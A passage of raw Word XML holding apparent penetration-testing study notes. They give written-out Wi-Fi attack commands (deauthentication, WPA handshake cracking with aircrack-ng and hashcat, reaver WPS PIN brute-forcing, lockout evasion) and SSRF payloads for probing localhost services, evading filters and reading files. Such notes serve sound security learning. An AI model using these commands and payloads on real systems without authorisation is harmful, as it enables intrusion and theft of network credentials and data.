          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in separate window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0426E96B" w14:textId="5E44E1E9" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>aireplay-ng -0 1 -a &lt;target MAC&gt; -c &lt;target MAC&gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139BA0E2" w14:textId="139C0743" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>after successful capturing handshake via airodump-ng, use aircrack-ng and wordlist to crack PSK found in the handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF4C2F" w14:textId="458BE7CB" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>aircrack-ng -w /path/to/wordlist.txt -b &lt;target MAC&gt; &lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234833CF" w14:textId="45377FEA" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can also use genpmk to create a PMK rainbow table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D330E98" w14:textId="44ADD008" w:rsidR="000D79A8" w:rsidRDefault="000D79A8" w:rsidP="000D79A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use cowpatty command with handshake pcap and genpmk file to crack key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12AC54" w14:textId="2B27D95D" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can also use hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA8D8B" w14:textId="5FD94AAD" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>convert pcap via cap2hccapx command to format hashcat can use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12B114" w14:textId="190A9F91" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>./cap2hccapx &lt;outfile&gt;.cap &lt;newfile&gt;.hccapx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47982C6E" w14:textId="1612439C" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>verify hashcat can see GPU/CPU via hashcat -I command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B881B3" w14:textId="41D7BA06" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C084D74" w14:textId="5C5CE11E" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hashcat -m 2500 &lt;newfile&gt;.hccapx &lt;wordlist.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235343B" w14:textId="3888350D" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking WPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6805C5" w14:textId="437B2224" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use “wash” tool in Kali to ID all WPS networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D990D3" w14:textId="1E370895" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>wash -i &lt;interface&gt;mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4050FF0A" w14:textId="5A3B4700" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>after ID-ing target, use reaver command to brute-force WPS PIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FA703" w14:textId="22036A87" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reaver -i &lt;interface&gt; -b &lt;target MAC of AP&gt; -c &lt;channels&gt; -vvv -K 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A7CE1" w14:textId="75F245F7" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-K means pixie dust attack (brute-force WPS PIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72F95B" w14:textId="69012EF0" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Once PIN is determined, AP will provide WPA password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72A598" w14:textId="7841FC97" w:rsidR="00447769" w:rsidRDefault="00447769" w:rsidP="00447769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>recover password with reaver command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168414B5" w14:textId="68B4CA68" w:rsidR="004A0618" w:rsidRDefault="004A0618" w:rsidP="004A0618">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reaver -i &lt;interface&gt;mon -b &lt;BSSID&gt; -c 6 -vv -p &lt;PIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5D7D6" w14:textId="2D288A47" w:rsidR="004A0618" w:rsidRPr="00F512ED" w:rsidRDefault="004A0618" w:rsidP="004A0618">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try to bypass PIN lockout setting by setting a delay in reaver and running macchanger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965ED3B" w14:textId="5F0896FE" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75270508" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF, XXE, Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F900A9" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Server-Side Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B3DDF" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability in web applications that allows an attacker to make further HTTP requests through the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A14BD5" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>communicate with internal services on servers network which are typically protected by firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E71095" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>forces webserver to request data from the database, which is returned to the attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273F4AD" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allowed to pass by firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E74CD" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cause of the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53C227" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>blind trust of user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4C1861" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inputting an URL or IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FFC48" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used by web application to make a request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E3518" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF results from improper or lack of checks/filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E979283" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>arbitrary GET requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC9FA7" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E5B15E" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Basic Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D24BF9" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hint at SSRF vulnerability and succeeding payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B96DB8" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Start by searching localhost IP (127.0.0.1) with any port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2F2A6" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">check for hidden DB – </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:3306</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6113BD18" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL DB port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A260C" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>positive response = confirm DB running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A27C84" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Advanced Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FABD8" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Possible there is sanitation for strings such as localhost or 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C059C7" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Try IPv6 version of localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C411F1A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="007A6E65" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r w:rsidR="00AA747C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://[::]:3306</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7953135D" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if fail, might be due to language used handling input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031ADEB6" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try removing brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE8C69" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 might also be sanitized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBD7D00" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>encode IP into decimal or hexadecimal format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C714637" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F5DF5" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="007A6E65" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId100" w:history="1">
        <w:r w:rsidR="00AA747C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CE45FC3" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reading Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A9AED" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Proper schema necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03563CD6" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Req = http://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E687CD7" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL = file://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A0632" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>simple SSRF file reading payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C6795" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="007A6E65" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
